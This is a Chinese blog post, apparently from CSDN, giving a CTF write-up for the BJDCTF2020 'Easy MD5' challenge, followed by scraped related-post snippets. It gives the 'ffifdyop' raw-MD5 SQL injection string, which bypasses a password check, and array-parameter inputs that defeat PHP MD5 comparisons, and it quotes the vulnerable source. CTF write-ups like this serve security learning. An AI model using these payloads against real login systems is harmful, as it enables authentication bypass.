[BJDCTF2020]Easy MD5 -wp

最新推荐文章于 2023-10-26 20:51:11 发布
最新推荐文章于 2023-10-26 20:51:11 发布
阅读量1.3k 收藏 6
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107046439
版权

在这里插入图片描述
页面上就一搜索框,无论提交什么都没回显,f12查看响应头有提示

在这里插入图片描述
select * from ‘admin’ where password=md5($pass,true)
提示了后台查询语句

查看一下md5()函数的true参数

在这里插入图片描述

和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到

ffifdyop字符串会造成漏洞

在这里插入图片描述·在本地环境试验ffifdyop,输出的开头是'or'6xxxxxx
在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1 变成永真试

在这里插入图片描述

在bp输入ffifdyop回显是这样的,直接在输入框里直接输入就会直接跳到/levels91.php页面
跳转后查看源码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

可以用结果等于0exxxxxx的字符串,也可以使用数组
a[]=1&b[]=2

 <?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

使用数组
param1[]=1&param2[]=2

在这里插入图片描述

冰可乐不加可乐
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[buuoj][BJDCTF2020]Easy MD5
qq_42250840的博客
07-14 236
知识点: password=’".md5($pass,true)."’ ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6, 而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是1select * from ‘admin’ where password=’’ or ‘6xxxxx’ 等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数 php弱类型
[BJDCTF2020]Easy MD5 1
weixin_45577185的博客
06-24 1079
bp抓包看到: select * from ‘admin’ where password=md5($pass,true) 查看一下md5()函数的true参数 和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到 ffifdyop字符串会造成漏洞 ·在本地环境试验ffifdyop,输出的开头是’or’6xxxxxx 在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1.
[BJDCTF2020]Easy MD5(超级详细)
weixin_73560599的博客
07-29 2334
这题涉及的知识点挺多的,包括md5($pass,true)的注入,php的弱类型比较以及强类型比较 尤其是MD5的注入 非常有意思涉及的内容挺多,开阔视野以及知识
[BJDCTF2020]Easy MD5
pakho_C的博客
02-08 1039
web第22题 [BJDCTF2020]Easy MD5 打开靶场: 查看源码: 就是一个单纯的form表单,get方式传参提交,所以无论提交任何数据页面都没有任何回显 使用burp抓包发送到repeater模块观察返回头 果然有发现,隐藏了一条sql查询 select * from 'admin' where password=md5($pass,true) 对于md5($pass,true),这位师傅解释的比较详细 [BJDCTF2020]Easy MD5 将第二个参数设置为true时,会将s
ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 4714
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
[BJDCTF 2020]easy_md5
jayq1的博客
07-14 537
考点:响应包 php 弱比较
easy-rsa-2.2.0.tar.gz
06-30
首先,我们需要从源代码包`easy-rsa-2.2.0.tar.gz`中解压并安装。这通常包括解压、进入目录、配置和编译过程。在Unix/Linux环境下,可以使用以下命令: ``` tar -zxvf easy-rsa-2.2.0.tar.gz cd easy-rsa-2.2.0 ./...
easy-rsa-old-master.zip
09-29
easy-rsa-old-master.zip . ├── configure.ac ├── COPYING ├── COPYRIGHT.GPL ├── distro │ ├── Makefile.am │ └── rpm │ ├── easy-rsa.spec.in │ └── Makefile.am ├── doc │ ...
easy-grade-pro-4.0.3
11-26
"easy-grade-pro-4.0.3" 是一个教育评估软件的版本号,这表明我们正在讨论 Easy Grade Pro 的4.0.3版。Easy Grade Pro(EGP)是一款专为教师设计的评分和成绩管理工具,它简化了学生作业评分、考试成绩统计以及整体...
MD5.zip_MD5Java_easy _elephantykb
09-21
标题中的"MD5.zip_MD5Java_easy_elephantykb"表明这是一个关于Java实现MD5加密的压缩包,易于使用,由用户"elephantykb"分享。这个压缩包可能包含了实现MD5加密功能的相关代码和文档。 描述中提到"JAVAMD5加密 很...
easy-taskeasy-taskeasy-task
06-18
在给定的信息中,标题和描述中提到的关键词是"easy-task",这可能是指一个简单任务或项目,而标签同样为"easy-task",暗示这可能是一个与简化工作流程或者自动化简易任务相关的主题。然而,没有提供足够的具体信息来...
[BJDCTF2020]Easy MD5(详细)
热门推荐
qq_43622442的博客
04-21 1万+
[BJDCTF2020]Easy MD5(详细) 这一题也是挺多知识点的。 1.打开网站,发现输入啥都没变化: 2.看到响应头有提示,应该是绕过md5进行注入了: 3.这里有个很离谱的点,我是真的没想到:          md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返...
【BUUCTF之[BJDCTF2020]Easy MD5
qq_40646572的博客
10-25 1067
个人感觉,给了源码的题,这个难度基本就是送分题,如果不给源码,感觉难度可以上升一点,首先我们可以使用web目录直接爆破出levell14.php页面,但可以使用refer限制来源,这样我们就可以老老实实的从leveldo4.php页面开始。难度就会上升,比较考验字典了就。(本质上来说,这道题实质就是考察md5的绕过,难度一般)。
buuctf [BJDCTF2020]Easy MD5
m_de_g的博客
11-09 1294
1.ffifdyop经过md5加密后,使用hex解码可以转换为'or'2.MySQL默认将十六进制数转换为hex();3…md5的强连接和弱连接使用数组绕过;
BUUCTF [BJDCTF2020]Easy MD5
weixin_74020633的博客
10-26 99
关键:在mysql中,在用作布尔型判断时,1或者其他数字,比如这里的6开头的字符串会被当做整形常数,也就是说这里的sql语句变为了select * from 'admin' where password=''or 6,返回值就为true。在绕过弱比较后,看到了flag的提示,只要同时绕过弱比较和强比较就能拿到flag,上面说过强比较需要用数组绕过,同时也能绕过弱比较param1[]=1¶m2[]=2。原理:输入可以被md5加密为0eXXXX的数,这样在md5识别是都会翻译为0的几次方,都等于0,也就相等;
2024年公关服务行业分析报告.pptx
最新发布
07-09
行业报告
mrcrowl.easy-less-1.7.2
07-09
### 回答1: mrcrowl.easy-less-1.7.2是一个用于编译Less文件的工具。Less是一种基于CSS的扩展语言,它提供了一些常见的CSS缺失特性,如变量、嵌套、混合、函数等,使得编写和维护样式代码更加方便和灵活。 mrcrowl.easy-less-1.7.2通过解析Less文件并将其转换为普通的CSS文件,实现了对Less语法的支持。它提供了一个简单的界面来配置和操作编译过程,使得使用者无需了解复杂的编译过程也能轻松地将Less转换为CSS。 使用mrcrowl.easy-less-1.7.2,我们可以轻松创建一个Less项目,并定义变量和混合,以及嵌套的样式规则。通过编译,mrcrowl.easy-less-1.7.2将会自动将Less文件转换为生成对应的CSS文件,供我们在网页中使用。 除了基本的编译功能之外,mrcrowl.easy-less-1.7.2还支持一些高级特性,如自动压缩合并、自动添加浏览器兼容前缀等。这些特性使得我们在开发过程中能够更加高效地编写样式代码,并减少了手动处理的工作量。 总而言之,mrcrowl.easy-less-1.7.2是一个简单易用的Less编译工具,它为开发者提供了方便的方式来将Less代码转换为CSS,提高了样式代码的可维护性和效率。无论是个人项目还是团队开发,mrcrowl.easy-less-1.7.2都是一个非常有用的工具。 ### 回答2: mrcrowl.easy-less-1.7.2是一个用于开发Web应用程序的简化CSS编写工具。它是基于Less预处理器构建的,Less是一种CSS扩展语言,通过它可以更方便地编写和管理CSS代码。 mrcrowl.easy-less-1.7.2的主要目的是简化CSS编写的过程。它提供了一种更加简洁和有层次结构的方式来组织和编写CSS代码。通过使用变量、混合(Mixins)、嵌套规则和其他功能,开发人员可以更容易地管理和重用样式。此外,它还提供了一些额外的功能,比如自动前缀、颜色函数和数学运算,进一步简化了CSS开发。 mrcrowl.easy-less-1.7.2具有良好的兼容性和易用性。开发人员可以将其集成到任何基于Web的项目中,并与其他前端开发工具和框架一起使用。它可以根据开发人员的需求进行定制,以满足特定的项目需求。 总而言之,mrcrowl.easy-less-1.7.2是一个强大而方便的CSS编写工具,它提供了许多简化CSS开发的功能和特性,使开发人员能够更高效地编写和管理样式。无论是初学者还是有经验的开发人员,都可以从中受益,并节省大量的开发时间和精力。 ### 回答3: mrcrowl.easy-less-1.7.2是一个用于编译Less代码的工具。Less(Leaner Style Sheets)是一种动态样式语言,它扩展了CSS的功能,使得样式的编写更加简洁和灵活。 使用mrcrowl.easy-less-1.7.2,可以将Less文件编译成CSS文件。这样可以在开发过程中使用Less语法来编写样式,而无需在浏览器中进行实时编译。编译后的CSS文件可以直接用于网页的样式调用,使网页加载速度更快。 mrcrowl.easy-less-1.7.2的使用非常简单。首先,需要将Less文件放置在指定的目录中。然后,使用命令行工具或者脚本运行mrcrowl.easy-less-1.7.2,指定Less文件的路径和编译后的CSS文件的保存路径。工具会自动读取Less文件,并将其编译成CSS文件。 mrcrowl.easy-less-1.7.2还支持一些额外的功能。例如,可以设置编译选项,包括压缩CSS,生成Source Map等。还可以监听Less文件的变化,一旦文件发生修改,工具会自动重新编译,提高开发效率。 总的来说,mrcrowl.easy-less-1.7.2是一个实用的Less编译工具,可以简化前端开发过程中的样式编写工作。使用它,我们可以更加便捷地使用Less语法,提高开发效率和网页加载速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值